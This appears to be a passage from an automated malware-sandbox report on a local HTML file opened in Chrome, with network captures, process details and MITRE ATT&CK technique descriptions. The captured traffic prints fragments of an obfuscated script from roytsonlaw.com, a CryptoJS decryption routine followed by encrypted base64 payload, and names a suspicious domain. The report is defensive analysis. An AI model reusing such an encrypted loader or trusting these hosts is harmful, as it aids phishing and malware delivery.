Mar 12, 2025 14:07:50.868067980 CET	53	49777	1.1.1.1	192.168.2.6
Mar 12, 2025 14:07:52.331907034 CET	59500	53	192.168.2.6	1.1.1.1
Mar 12, 2025 14:07:52.332065105 CET	62901	53	192.168.2.6	1.1.1.1
Mar 12, 2025 14:07:52.339517117 CET	53	59500	1.1.1.1	192.168.2.6
Mar 12, 2025 14:07:52.339622974 CET	53	62901	1.1.1.1	192.168.2.6
Mar 12, 2025 14:07:55.147178888 CET	55538	53	192.168.2.6	1.1.1.1
Mar 12, 2025 14:07:55.147412062 CET	57550	53	192.168.2.6	1.1.1.1
Mar 12, 2025 14:07:55.153774977 CET	53	55538	1.1.1.1	192.168.2.6
Mar 12, 2025 14:07:55.153902054 CET	53	57550	1.1.1.1	192.168.2.6
Mar 12, 2025 14:07:56.411565065 CET	53	57808	1.1.1.1	192.168.2.6
Mar 12, 2025 14:08:14.111619949 CET	138	138	192.168.2.6	192.168.2.255
Mar 12, 2025 14:08:15.217006922 CET	53	56149	1.1.1.1	192.168.2.6
Mar 12, 2025 14:08:15.803313971 CET	53	61347	1.1.1.1	192.168.2.6
Mar 12, 2025 14:08:20.818941116 CET	53	62846	1.1.1.1	192.168.2.6
Mar 12, 2025 14:08:20.866355896 CET	53	51349	1.1.1.1	192.168.2.6
Mar 12, 2025 14:08:34.188815117 CET	53	53642	1.1.1.1	192.168.2.6
Mar 12, 2025 14:08:38.264600039 CET	53	54048	1.1.1.1	192.168.2.6
Mar 12, 2025 14:09:08.951770067 CET	53	50689	1.1.1.1	192.168.2.6
Mar 12, 2025 14:09:20.997209072 CET	53	54179	1.1.1.1	192.168.2.6
Mar 12, 2025 14:09:24.629842997 CET	53	62465	1.1.1.1	192.168.2.6
Mar 12, 2025 14:09:38.191014051 CET	53	62694	1.1.1.1	192.168.2.6
Mar 12, 2025 14:09:55.594326973 CET	53	51749	1.1.1.1	192.168.2.6
Mar 12, 2025 14:10:35.850035906 CET	53	57155	1.1.1.1	192.168.2.6

Timestamp	Bytes transferred	Direction	Data
2025-03-12 13:07:41 UTC	671	OUT	GET //attach/js/DN9YxDgT2IfcbDTLzkzzxg7rLKec65cARK2vYL6IZ5kCVB9G3P.js HTTP/1.1 Host: roytsonlaw.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-12 13:07:42 UTC	380	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 12 Mar 2025 13:07:41 GMT Content-Type: application/javascript Content-Length: 21228 Last-Modified: Tue, 11 Mar 2025 16:06:49 GMT Connection: close Vary: Accept-Encoding ETag: "67d05f99-52ec" Expires: Thu, 13 Mar 2025 01:07:41 GMT Cache-Control: max-age=43200 Strict-Transport-Security: max-age=31536000 Accept-Ranges: bytes
2025-03-12 13:07:42 UTC	16004	IN	Data Raw: 0d 0a 66 75 6e 63 74 69 6f 6e 20 64 65 63 73 74 72 28 65 6e 63 72 79 70 74 65 64 53 74 72 69 6e 67 2c 20 6b 65 79 29 20 7b 0d 0a 20 20 63 6f 6e 73 74 20 65 6e 63 72 79 70 74 65 64 44 61 74 61 20 3d 20 43 72 79 70 74 6f 4a 53 2e 65 6e 63 2e 42 61 73 65 36 34 2e 70 61 72 73 65 28 65 6e 63 72 79 70 74 65 64 53 74 72 69 6e 67 29 3b 0d 0a 0d 0a 20 20 63 6f 6e 73 74 20 69 76 20 3d 20 43 72 79 70 74 6f 4a 53 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2e 63 72 65 61 74 65 28 65 6e 63 72 79 70 74 65 64 44 61 74 61 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 2c 20 34 29 29 3b 0d 0a 0d 0a 20 20 63 6f 6e 73 74 20 63 69 70 68 65 72 74 65 78 74 20 3d 20 43 72 79 70 74 6f 4a 53 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2e 63 72 65 61 74 65 28 0d 0a 20 20 20 20 65 6e 63 72 Data Ascii: function decstr(encryptedString, key) { const encryptedData = CryptoJS.enc.Base64.parse(encryptedString); const iv = CryptoJS.lib.WordArray.create(encryptedData.words.slice(0, 4)); const ciphertext = CryptoJS.lib.WordArray.create( encr
2025-03-12 13:07:42 UTC	5224	IN	Data Raw: 57 78 35 54 7a 4e 56 57 6d 35 4b 56 30 64 6d 62 7a 68 31 4e 6e 4e 53 54 56 6f 72 56 6c 56 69 52 30 4a 56 63 32 39 49 5a 43 73 31 53 6b 70 71 62 45 46 70 62 6a 68 6e 5a 6e 6f 7a 65 6b 56 43 4d 47 64 77 53 32 70 71 52 44 52 32 4d 31 56 43 55 45 64 70 51 55 77 77 57 6d 59 31 51 57 45 33 4e 47 74 4c 4e 6a 42 70 5a 7a 67 77 62 44 41 78 5a 32 74 4b 64 44 42 52 5a 57 68 6f 4e 30 78 4f 51 31 46 75 51 7a 46 6d 57 6c 56 44 4d 30 63 30 55 6e 41 33 4e 53 74 52 59 56 4e 69 5a 47 4a 52 64 6c 68 32 4d 30 6c 75 57 47 74 6c 59 54 4e 5a 4e 33 6f 7a 5a 6e 6c 6d 63 57 74 61 64 6c 56 4d 4d 32 5a 76 54 55 6c 4e 62 79 74 75 4e 44 52 4e 51 6d 46 77 57 58 52 70 53 6b 39 59 54 6d 6b 30 4e 47 74 79 5a 6e 46 69 5a 58 5a 43 64 58 64 4a 61 57 39 50 61 7a 56 30 52 6b 70 35 57 44 4e 4e Data Ascii: Wx5TzNVWm5KV0dmbzh1NnNSTVorVlViR0JVc29IZCs1SkpqbEFpbjhnZnozekVCMGdwS2pqRDR2M1VCUEdpQUwwWmY1QWE3NGtLNjBpZzgwbDAxZ2tKdDBRZWhoN0xOQ1FuQzFmWlVDM0c0UnA3NStRYVNiZGJRdlh2M0luWGtlYTNZN3ozZnlmcWtadlVMM2ZvTUlNbytuNDRNQmFwWXRpSk9YTmk0NGtyZnFiZXZCdXdJaW9PazV0Rkp5WDNN

Timestamp	Bytes transferred	Direction	Data
2025-03-12 13:07:50 UTC	627	OUT	GET /jquery-3.6.0.min.js HTTP/1.1 Host: code.jquery.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-12 13:07:50 UTC	610	IN	HTTP/1.1 200 OK Connection: close Content-Length: 89501 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-15d9d" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin Via: 1.1 varnish, 1.1 varnish Accept-Ranges: bytes Date: Wed, 12 Mar 2025 13:07:50 GMT Age: 3026471 X-Served-By: cache-lga21931-LGA, cache-yul1970055-YUL X-Cache: HIT, HIT X-Cache-Hits: 8175, 211 X-Timer: S1741784870.361089,VS0,VE0 Vary: Accept-Encoding
2025-03-12 13:07:50 UTC	16384	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 Data Ascii: /! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
2025-03-12 13:07:50 UTC	16384	IN	Data Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]\|\|(a[S]={}))[a.uniqueID]\|\|(o[a.uniqueID]={}))[h]\|\|[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]\|\|(d=s=0)\|\|u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]\|\|(a[S]={}))[a.uniqueID]\|
2025-03-12 13:07:50 UTC	16384	IN	Data Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType\|\|9===e.nodeType\|\|!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t\|\|(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
2025-03-12 13:07:50 UTC	16384	IN	Data Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65 Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
2025-03-12 13:07:50 UTC	16384	IN	Data Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)\|\|(i=S.attrHooks[t.toLowerCase()]\|\|(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
2025-03-12 13:07:50 UTC	7581	IN	Data Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52 Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain\|\|e["X-Requested-With"]\|\|(e["X-R

Timestamp	Bytes transferred	Direction	Data
2025-03-12 13:07:54 UTC	572	OUT	OPTIONS /report/v4?s=XcJ6ApuSuj4Tn9fAOLzsvDzKknSVMyqyht3otbrb0LN%2F2OT65akNCYA7QsOE6hbVs4Ana%2BkoJxKe%2BXjg4Y%2Brz4l04Ip0SGvPblsQ7z4JMAKWqpJwgGc5eGQfF7zF5nHpJQt%2Ff%2FBW%2BL5yxw%3D%3D HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Origin: https://wicked.bigpoliceman.com Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-12 13:07:54 UTC	336	IN	HTTP/1.1 200 OK Content-Length: 0 access-control-max-age: 86400 access-control-allow-methods: POST, OPTIONS access-control-allow-origin: * access-control-allow-headers: content-type, content-length date: Wed, 12 Mar 2025 13:07:54 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
2025-03-12 13:07:56 UTC	547	OUT	POST /report/v4?s=XcJ6ApuSuj4Tn9fAOLzsvDzKknSVMyqyht3otbrb0LN%2F2OT65akNCYA7QsOE6hbVs4Ana%2BkoJxKe%2BXjg4Y%2Brz4l04Ip0SGvPblsQ7z4JMAKWqpJwgGc5eGQfF7zF5nHpJQt%2Ff%2FBW%2BL5yxw%3D%3D HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Content-Length: 389 Content-Type: application/reports+json Origin: https://wicked.bigpoliceman.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-12 13:07:56 UTC	389	OUT	Data Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 34 32 39 37 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 32 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 34 33 2e 31 35 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 35 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 69 63 6b 65 64 2e 62 69 67 70 6f 6c 69 63 65 6d 61 6e 2e Data Ascii: [{"age":0,"body":{"elapsed_time":4297,"method":"GET","phase":"application","protocol":"h2","referrer":"","sampling_fraction":1.0,"server_ip":"172.67.143.150","status_code":405,"type":"http.error"},"type":"network-error","url":"https://wicked.bigpoliceman.
2025-03-12 13:07:57 UTC	214	IN	HTTP/1.1 200 OK Content-Length: 0 access-control-allow-origin: * vary: Origin date: Wed, 12 Mar 2025 13:07:57 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
2025-03-12 13:08:54 UTC	564	OUT	OPTIONS /report/v4?s=r49yJtdxG5YLmL2fdC0ELYgESI%2BLfE%2BbJQWjrrjNVZNAoUzZEtrBchVJ0LCy0IhE4HN15tQdZ4uBQjOQFmbzbTyeZ22MhnCF1MqbGyvXaRKAukFtuvJTCyXqYBC0CO2WlhDkE9%2BmhCsU0g%3D%3D HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Origin: https://wicked.bigpoliceman.com Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-12 13:08:54 UTC	336	IN	HTTP/1.1 200 OK Content-Length: 0 access-control-max-age: 86400 access-control-allow-methods: POST, OPTIONS access-control-allow-origin: * access-control-allow-headers: content-type, content-length date: Wed, 12 Mar 2025 13:08:54 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
2025-03-12 13:08:56 UTC	540	OUT	POST /report/v4?s=r49yJtdxG5YLmL2fdC0ELYgESI%2BLfE%2BbJQWjrrjNVZNAoUzZEtrBchVJ0LCy0IhE4HN15tQdZ4uBQjOQFmbzbTyeZ22MhnCF1MqbGyvXaRKAukFtuvJTCyXqYBC0CO2WlhDkE9%2BmhCsU0g%3D%3D HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Content-Length: 1174 Content-Type: application/reports+json Origin: https://wicked.bigpoliceman.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-12 13:08:56 UTC	1174	OUT	Data Raw: 5b 7b 22 61 67 65 22 3a 32 30 37 30 33 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 35 36 39 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 32 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 34 33 2e 31 35 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 35 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 69 63 6b 65 64 2e 62 69 67 70 6f 6c 69 63 65 6d Data Ascii: [{"age":20703,"body":{"elapsed_time":569,"method":"GET","phase":"application","protocol":"h2","referrer":"","sampling_fraction":1.0,"server_ip":"172.67.143.150","status_code":405,"type":"http.error"},"type":"network-error","url":"https://wicked.bigpolicem
2025-03-12 13:08:57 UTC	214	IN	HTTP/1.1 200 OK Content-Length: 0 access-control-allow-origin: * vary: Origin date: Wed, 12 Mar 2025 13:08:57 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Target ID:	2
Start time:	09:07:08
Start date:	12/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff63b000000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	3
Start time:	09:07:14
Start date:	12/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2012,i,14865447731612743926,3150077887963785523,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2040 /prefetch:3
Imagebase:	0x7ff68dae0000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	7
Start time:	09:07:20
Start date:	12/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\.html"
Imagebase:	0x7ff63b000000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
